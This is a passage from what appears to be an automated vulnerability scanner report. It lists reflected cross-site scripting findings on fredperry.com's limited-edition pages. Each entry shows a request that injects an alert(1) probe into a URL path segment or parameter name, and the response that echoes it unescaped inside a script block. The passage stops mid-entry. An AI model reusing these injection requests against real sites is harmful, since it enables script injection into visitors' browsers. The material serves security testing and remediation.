1.172. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jackets/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a152f"-alert(1)-"3d9d99bfa20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/jacketsa152f"-alert(1)-"3d9d99bfa20/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=6rg1nk1384d1d76b76uptsmhd0; expires=Tue, 09-Nov-2010 17:21:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/jacketsa152f"-alert(1)-"3d9d99bfa20/");
//]]>
...[SNIP]...

1.173. http://www.fredperry.com/limited-edition/women/jackets/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d11e"-alert(1)-"b8edafd3dcd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/jackets/?4d11e"-alert(1)-"b8edafd3dcd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mnmvr8jjf8lmeu2ltp2of88na0; expires=Tue, 09-Nov-2010 17:19:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/jackets/?4d11e"-alert(1)-"b8edafd3dcd=1");
//]]>
...[SNIP]...

1.174. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jessica-ogden/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b961f"-alert(1)-"fcdca4ddcf3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionb961f"-alert(1)-"fcdca4ddcf3/women/jessica-ogden/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9s13ojrvlg1gobuv19o3vi9155; expires=Tue, 09-Nov-2010 17:15:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionb961f"-alert(1)-"fcdca4ddcf3/women/jessica-ogden/");
//]]>
...[SNIP]...

1.175. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jessica-ogden/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27cbb"-alert(1)-"bdf6fdec2fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women27cbb"-alert(1)-"bdf6fdec2fd/jessica-ogden/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8k235i9lhgm9jn9sgh3r21dfa7; expires=Tue, 09-Nov-2010 17:15:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women27cbb"-alert(1)-"bdf6fdec2fd/jessica-ogden/");
//]]>
...[SNIP]...

1.176. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jessica-ogden/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2c68"-alert(1)-"27abae530fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/jessica-ogdend2c68"-alert(1)-"27abae530fc/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tid48jmod097u2stfo0nd2a5e2; expires=Tue, 09-Nov-2010 17:15:55 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/jessica-ogdend2c68"-alert(1)-"27abae530fc/");
//]]>
...[SNIP]...

1.177. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/jessica-ogden/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf5f1"-alert(1)-"ac5226bfd92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/jessica-ogden/?bf5f1"-alert(1)-"ac5226bfd92=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7mi7u875n0j1fti1hbijatf3m3; expires=Tue, 09-Nov-2010 17:14:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/jessica-ogden/?bf5f1"-alert(1)-"ac5226bfd92=1");
//]]>
...[SNIP]...

1.178. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/knitwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f00fd"-alert(1)-"1af4778c88e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editionf00fd"-alert(1)-"1af4778c88e/women/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=evuojm770mansedc0kpbmgaum1; expires=Tue, 09-Nov-2010 17:20:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionf00fd"-alert(1)-"1af4778c88e/women/knitwear/");
//]]>
...[SNIP]...

1.179. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/knitwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eebd"-alert(1)-"d37ff8bf82b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women2eebd"-alert(1)-"d37ff8bf82b/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9br5o47e55n53418d1e1jtmcq2; expires=Tue, 09-Nov-2010 17:20:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women2eebd"-alert(1)-"d37ff8bf82b/knitwear/");
//]]>
...[SNIP]...

1.180. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/knitwear/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa892"-alert(1)-"6112ce3a2d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/knitwearaa892"-alert(1)-"6112ce3a2d3/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=47h3pa66t9h7jtmvakhcjfjb07; expires=Tue, 09-Nov-2010 17:20:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/knitwearaa892"-alert(1)-"6112ce3a2d3/");
//]]>
...[SNIP]...

1.181. http://www.fredperry.com/limited-edition/women/knitwear/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/knitwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fee8d"-alert(1)-"5f12871407c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/knitwear/?fee8d"-alert(1)-"5f12871407c=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=52n4f0jpe4h3s6c7f3eki0h7b2; expires=Tue, 09-Nov-2010 17:18:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/knitwear/?fee8d"-alert(1)-"5f12871407c=1");
//]]>
...[SNIP]...

1.182. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/new-styles/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 125f5"-alert(1)-"339b310c262 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition125f5"-alert(1)-"339b310c262/women/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s8g9vok5absmav3sjkv3m79d95; expires=Tue, 09-Nov-2010 17:15:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition125f5"-alert(1)-"339b310c262/women/new-styles/");
//]]>
...[SNIP]...

1.183. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/new-styles/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c00d"-alert(1)-"3d2b6026ddb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women5c00d"-alert(1)-"3d2b6026ddb/new-styles/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7mc5c6ge65unqhrcrhbm1lg3g5; expires=Tue, 09-Nov-2010 17:15:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women5c00d"-alert(1)-"3d2b6026ddb/new-styles/");
//]]>
...[SNIP]...

1.184. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/new-styles/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76af3"-alert(1)-"e9741ad8f26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/new-styles76af3"-alert(1)-"e9741ad8f26/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i83m7vgo6klbkt13pvu7ha0sf3; expires=Tue, 09-Nov-2010 17:15:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/new-styles76af3"-alert(1)-"e9741ad8f26/");
//]]>
...[SNIP]...

1.185. http://www.fredperry.com/limited-edition/women/new-styles/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/new-styles/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ea62"-alert(1)-"7d2c500e6f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

